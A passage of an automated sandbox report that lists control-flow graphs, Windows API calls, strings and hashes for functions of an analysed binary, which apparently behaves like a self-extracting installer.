fcc71-fcc85 SendMessageW 481->485 485->368 488->478 489->435 490 fc97f-fc989 MoveFileExW 489->490 490->435 491->453 497 fc8c9-fc908 call 103e13 call ffff0 491->497 492->491 492->497 497->459
                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000FC744
                                                                                                                                            • Part of subcall function 000FB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 000FB3FB
                                                                                                                                          • _wcslen.LIBCMT ref: 000FCA0A
                                                                                                                                          • _wcslen.LIBCMT ref: 000FCA13
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 000FCA71
                                                                                                                                          • _wcslen.LIBCMT ref: 000FCAB3
                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 000FCBFB
                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 000FCC36
                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 000FCC46
                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,0012A472), ref: 000FCC54
                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000FCC7F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                          • API String ID: 2804936435-312220925
                                                                                                                                          • Opcode ID: aa44e662772b6a37509c2de03051897245749421f0ffe1fe745121f6207b0221
                                                                                                                                          • Instruction ID: 9d8a8c8b3cfafb878b5109d963ed2b2dae86125011efd46e3e2ba201c168e575
                                                                                                                                          • Opcode Fuzzy Hash: aa44e662772b6a37509c2de03051897245749421f0ffe1fe745121f6207b0221
                                                                                                                                          • Instruction Fuzzy Hash: BDE161B290025CAADB24DBA0DD86DFE73BCAB05350F4441A6F749E3491EB749F849B60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000EDA70
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000EDAAC
                                                                                                                                            • Part of subcall function 000EC29A: _wcslen.LIBCMT ref: 000EC2A2
                                                                                                                                            • Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0
                                                                                                                                            • Part of subcall function 000F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000EBAE9,00000000,?,?,?,000204A2), ref: 000F1BA0
                                                                                                                                          • _wcslen.LIBCMT ref: 000EDDE9
                                                                                                                                          • __fprintf_l.LIBCMT ref: 000EDF1C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                          • API String ID: 566448164-801612888
                                                                                                                                          • Opcode ID: e331553263f1d1b01c0fd45c6d5737fddf83951047a2c2bbc03ce3f0a9cf6436
                                                                                                                                          • Instruction ID: 1e2fc7abdb445389dd7d4bc783279a7ad36a05ebf4cb1af835660e1839b558e9
                                                                                                                                          • Opcode Fuzzy Hash: e331553263f1d1b01c0fd45c6d5737fddf83951047a2c2bbc03ce3f0a9cf6436
                                                                                                                                          • Instruction Fuzzy Hash: 1332E271900298DFCF68EF65CC45AEE77A9FF14300F40056AFA45AB292E7B19D85CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 801 fd4d4-fd500 call fb568 GetDlgItem 804 fd536-fd570 SendMessageW * 2 801->804 805 fd502-fd52f call f9285 ShowWindow SendMessageW * 2 801->805 806 fd572-fd58d 804->806 807 fd591-fd5c2 SendMessageW * 3 804->807 805->804 806->807 809 fd5e7-fd5fd SendMessageW 807->809 810 fd5c4-fd5e1 SendMessageW 807->810 810->809
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
                                                                                                                                            • Part of subcall function 000FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
                                                                                                                                            • Part of subcall function 000FB568: IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
                                                                                                                                            • Part of subcall function 000FB568: TranslateMessage.USER32(?), ref: 000FB5AC
                                                                                                                                            • Part of subcall function 000FB568: DispatchMessageW.USER32(?), ref: 000FB5B6
                                                                                                                                          • GetDlgItem.USER32(00000068,0013FCB8), ref: 000FD4E8
                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,000FAF07,00000001,?,?,000FB7B9,0011506C,0013FCB8,0013FCB8,00001000,00000000,00000000), ref: 000FD510
                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000FD51B
                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,001135F4), ref: 000FD529
                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD53F
                                                                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000FD559
                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD59D
                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000FD5AB
                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD5BA
                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD5E1
                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,001143F4), ref: 000FD5F0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                          • String ID: \
                                                                                                                                          • API String ID: 3569833718-2967466578
                                                                                                                                          • Opcode ID: 54756857fe4b10de885d2b9441a15e1162067260fc8cb746a7119acb58479067
                                                                                                                                          • Instruction ID: 5795b5166c63fd0cb170444a46182a3a028694b992f1192698b2e13143373e6c
                                                                                                                                          • Opcode Fuzzy Hash: 54756857fe4b10de885d2b9441a15e1162067260fc8cb746a7119acb58479067
                                                                                                                                          • Instruction Fuzzy Hash: CE312471145746BFE311DF20DC1AFAB7FACEB83708F000619F661965A0DBA48A45CB76
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 837 fd78f-fd7a7 call fec50 840 fd7ad-fd7b9 call 103e13 837->840 841 fd9e8-fd9f0 837->841 840->841 844 fd7bf-fd7e7 call ffff0 840->844 847 fd7e9 844->847 848 fd7f1-fd7ff 844->848 847->848 849 fd812-fd818 848->849 850 fd801-fd804 848->850 852 fd85b-fd85e 849->852 851 fd808-fd80e 850->851 853 fd837-fd844 851->853 854 fd810 851->854 852->851 855 fd860-fd866 852->855 857 fd84a-fd84e 853->857 858 fd9c0-fd9c2 853->858 856 fd822-fd82c 854->856 859 fd86d-fd86f 855->859 860 fd868-fd86b 855->860 863 fd82e 856->863 864 fd81a-fd820 856->864 865 fd9c6 857->865 866 fd854-fd859 857->866 858->865 861 fd882-fd898 call eb92d 859->861 862 fd871-fd878 859->862 860->859 860->861 872 fd89a-fd8a7 call f1fbb 861->872 873 fd8b1-fd8bc call ea231 861->873 862->861 867 fd87a 862->867 863->853 864->856 869 fd830-fd833 864->869 871 fd9cf 865->871 866->852 867->861 869->853 874 fd9d6-fd9d8 871->874 872->873 882 fd8a9 872->882 883 fd8be-fd8d5 call eb6c4 873->883 884 fd8d9-fd8e6 ShellExecuteExW 873->884 875 fd9da-fd9dc 874->875 876 fd9e7 874->876 875->876 879 fd9de-fd9e1 ShowWindow 875->879 876->841 879->876 882->873 883->884 884->876 885 fd8ec-fd8f9 884->885 887 fd90c-fd90e 885->887 888 fd8fb-fd902 885->888 891 fd925-fd944 call fdc3b 887->891 892 fd910-fd919 887->892 888->887 890 fd904-fd90a 888->890 890->887 893 fd97b-fd987 CloseHandle 890->893 891->893 906 fd946-fd94e 891->906 892->891 900 fd91b-fd923 ShowWindow 892->900 894 fd989-fd996 call f1fbb 893->894 895 fd998-fd9a6 893->895 894->871 894->895 895->874 899 fd9a8-fd9aa 895->899 899->874 903 fd9ac-fd9b2 899->903 900->891 903->874 905 fd9b4-fd9be 903->905 905->874 906->893 907 fd950-fd961 GetExitCodeProcess 906->907 907->893 908 fd963-fd96d 907->908 909 fd96f 908->909 910 fd974 908->910 909->910 910->893
                                                                                                                                          APIs
                                                                                                                                          • _wcslen.LIBCMT ref: 000FD7AE
                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 000FD8DE
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 000FD91D
                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 000FD959
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000FD97F
                                                                                                                                          • ShowWindow.USER32(?,00000001), ref: 000FD9E1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                          • String ID: .exe$.inf
                                                                                                                                          • API String ID: 36480843-3750412487
                                                                                                                                          • Opcode ID: 7ffcb2b04ece8e1f05b540a516887eab1eabca57b1ac54405628530ac0b975c6
                                                                                                                                          • Instruction ID: 1db3c4240daa3c418cf88241411137d73d1ccd7b530399b91a977451e1115d7e
                                                                                                                                          • Opcode Fuzzy Hash: 7ffcb2b04ece8e1f05b540a516887eab1eabca57b1ac54405628530ac0b975c6
                                                                                                                                          • Instruction Fuzzy Hash: 17510870408388AEDB709F64D844BBBBBE6AF81744F04041FF6C1979A1DBB18985EB52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 911 10a95b-10a974 912 10a976-10a986 call 10ef4c 911->912 913 10a98a-10a98f 911->913 912->913 920 10a988 912->920 915 10a991-10a999 913->915 916 10a99c-10a9c0 MultiByteToWideChar 913->916 915->916 918 10ab53-10ab66 call ffbbc 916->918 919 10a9c6-10a9d2 916->919 921 10a9d4-10a9e5 919->921 922 10aa26 919->922 920->913 925 10aa04-10aa15 call 108e06 921->925 926 10a9e7-10a9f6 call 112010 921->926 924 10aa28-10aa2a 922->924 928 10aa30-10aa43 MultiByteToWideChar 924->928 929 10ab48 924->929 925->929 936 10aa1b 925->936 926->929 939 10a9fc-10aa02 926->939 928->929 932 10aa49-10aa5b call 10af6c 928->932 933 10ab4a-10ab51 call 10abc3 929->933 941 10aa60-10aa64 932->941 933->918 940 10aa21-10aa24 936->940 939->940 940->924 941->929 943 10aa6a-10aa71 941->943 944 10aa73-10aa78 943->944 945 10aaab-10aab7 943->945 944->933 948 10aa7e-10aa80 944->948 946 10ab03 945->946 947 10aab9-10aaca 945->947 951 10ab05-10ab07 946->951 949 10aae5-10aaf6 call 108e06 947->949 950 10aacc-10aadb call 112010 947->950 948->929 952 10aa86-10aaa0 call 10af6c 948->952 955 10ab41-10ab47 call 10abc3 949->955 965 10aaf8 949->965 950->955 963 10aadd-10aae3 950->963 951->955 956 10ab09-10ab22 call 10af6c 951->956 952->933 967 10aaa6 952->967 955->929 956->955 969 10ab24-10ab2b 956->969 968 10aafe-10ab01 963->968 965->968 967->929 968->951 970 10ab67-10ab6d 969->970 971 10ab2d-10ab2e 969->971 972 10ab2f-10ab3f WideCharToMultiByte 970->972 971->972 972->955 973 10ab6f-10ab76 call 10abc3 972->973 973->933
                                                                                                                                          APIs
                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001057FB,001057FB,?,?,?,0010ABAC,00000001,00000001,2DE85006), ref: 0010A9B5
                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0010ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0010AA3B
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0010AB35
                                                                                                                                          • __freea.LIBCMT ref: 0010AB42
                                                                                                                                            • Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38
                                                                                                                                          • __freea.LIBCMT ref: 0010AB4B
                                                                                                                                          • __freea.LIBCMT ref: 0010AB70
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                          • Opcode ID: 67d4464515291194e00f9d20ca055b17a8eeb372cf39b185d50da57f7b020524
                                                                                                                                          • Instruction ID: cce1647369388a0cb48bd0363d871e27d710d1c0e034b34a65a142961241829b
                                                                                                                                          • Opcode Fuzzy Hash: 67d4464515291194e00f9d20ca055b17a8eeb372cf39b185d50da57f7b020524
                                                                                                                                          • Instruction Fuzzy Hash: 5251C072600316ABDB298E64CC41EBFB7AAEF54750F954629FC84D71C0EBB4DC90C692
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 976 103b72-103b7c 977 103bee-103bf1 976->977 978 103bf3 977->978 979 103b7e-103b8c 977->979 980 103bf5-103bf9 978->980 981 103b95-103bb1 LoadLibraryExW 979->981 982 103b8e-103b91 979->982 985 103bb3-103bbc GetLastError 981->985 986 103bfa-103c00 981->986 983 103b93 982->983 984 103c09-103c0b 982->984 990 103beb 983->990 984->980 987 103be6-103be9 985->987 988 103bbe-103bd3 call 106088 985->988 986->984 989 103c02-103c03 FreeLibrary 986->989 987->990 988->987 993 103bd5-103be4 LoadLibraryExW 988->993 989->984 990->977 993->986 993->987
                                                                                                                                          APIs
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00103C35,00000000,00000FA0,00142088,00000000,?,00103D60,00000004,InitializeCriticalSectionEx,00116394,InitializeCriticalSectionEx,00000000), ref: 00103C03
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                          • String ID: api-ms-
                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                          • Opcode ID: a416fb2157c6a98c0256ffae022d22ab4505013aa914fca3648dd9c93e06c01c
                                                                                                                                          • Instruction ID: 6378b8220c7e03a109397c15080eb65b265474bc25a03b802c77cd369ab12d53
                                                                                                                                          • Opcode Fuzzy Hash: a416fb2157c6a98c0256ffae022d22ab4505013aa914fca3648dd9c93e06c01c
                                                                                                                                          • Instruction Fuzzy Hash: 06110A31A45220ABCB328B589C4179977A89F01774F150111F8B5FB2D4D7B1EF4086D0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
                                                                                                                                            • Part of subcall function 000F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858
                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 000FAC2F
                                                                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000FAC66
                                                                                                                                          • SHGetMalloc.SHELL32(00128438), ref: 000FAC70
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                          • String ID: riched20.dll$3To
                                                                                                                                          • API String ID: 3498096277-2168385784
                                                                                                                                          • Opcode ID: dab1fc9716348ddd42e1909d9ac3893188999cca2c8ebb55df40606c94227219
                                                                                                                                          • Instruction ID: 61be7667943a39e83f86be4381d8da85ade1d25c3e0aa77d67620a48e57db891
                                                                                                                                          • Opcode Fuzzy Hash: dab1fc9716348ddd42e1909d9ac3893188999cca2c8ebb55df40606c94227219
                                                                                                                                          • Instruction Fuzzy Hash: 10F06DB5D00209ABCB10AFA9D8499EFFFFCEF85700F10411AE511E2251CBB456468FA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 998 ef2c5-ef2cc 999 ef2ce-ef2dc call f081b 998->999 1000 ef301-ef302 998->1000 1003 ef2de-ef2fa GetProcAddress * 2 999->1003 1004 ef2fd 999->1004 1003->1004 1004->1000
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
                                                                                                                                            • Part of subcall function 000F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858
                                                                                                                                          • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 000EF2E4
                                                                                                                                          • GetProcAddress.KERNEL32(001281C8,CryptUnprotectMemory), ref: 000EF2F4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                          • API String ID: 2141747552-1753850145
                                                                                                                                          • Opcode ID: 9c33278f453bff2c4eee1d17e607307e51ffbac2a41afc8794c682c623f6ffa1
                                                                                                                                          • Instruction ID: aeaf055a299a7ac76a17e0783175e9ce4bbca353121debc8555ca97d6f1e8830
                                                                                                                                          • Opcode Fuzzy Hash: 9c33278f453bff2c4eee1d17e607307e51ffbac2a41afc8794c682c623f6ffa1
                                                                                                                                          • Instruction Fuzzy Hash: E1E04F719507429EC7259F35A949B917AD46F08700B14C82DF0EAE3A45EBB5D5C18B50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1005 e98e0-e9901 call fec50 1008 e990c 1005->1008 1009 e9903-e9906 1005->1009 1011 e990e-e991f 1008->1011 1009->1008 1010 e9908-e990a 1009->1010 1010->1011 1012 e9927-e9931 1011->1012 1013 e9921 1011->1013 1014 e9936-e9943 call e6edb 1012->1014 1015 e9933 1012->1015 1013->1012 1018 e994b-e996a CreateFileW 1014->1018 1019 e9945 1014->1019 1015->1014 1020 e996c-e998e GetLastError call ebb03 1018->1020 1021 e99bb-e99bf 1018->1021 1019->1018 1025 e99c8-e99cd 1020->1025 1030 e9990-e99b3 CreateFileW GetLastError 1020->1030 1023 e99c3-e99c6 1021->1023 1023->1025 1026 e99d9-e99de 1023->1026 1025->1026 1027 e99cf 1025->1027 1028 e99ff-e9a10 1026->1028 1029 e99e0-e99e3 1026->1029 1027->1026 1032 e9a2e-e9a39 1028->1032 1033 e9a12-e9a2a call f0602 1028->1033 1029->1028 1031 e99e5-e99f9 SetFileTime 1029->1031 1030->1023 1034 e99b5-e99b9 1030->1034 1031->1028 1033->1032 1034->1023
                                                                                                                                          APIs
                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,000E7760,?,00000005,?,00000011), ref: 000E995F
                                                                                                                                          • GetLastError.KERNEL32(?,?,000E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E996C
                                                                                                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,000E7760,?,00000005,?), ref: 000E99A2
                                                                                                                                          • GetLastError.KERNEL32(?,?,000E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E99AA
                                                                                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E99F9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
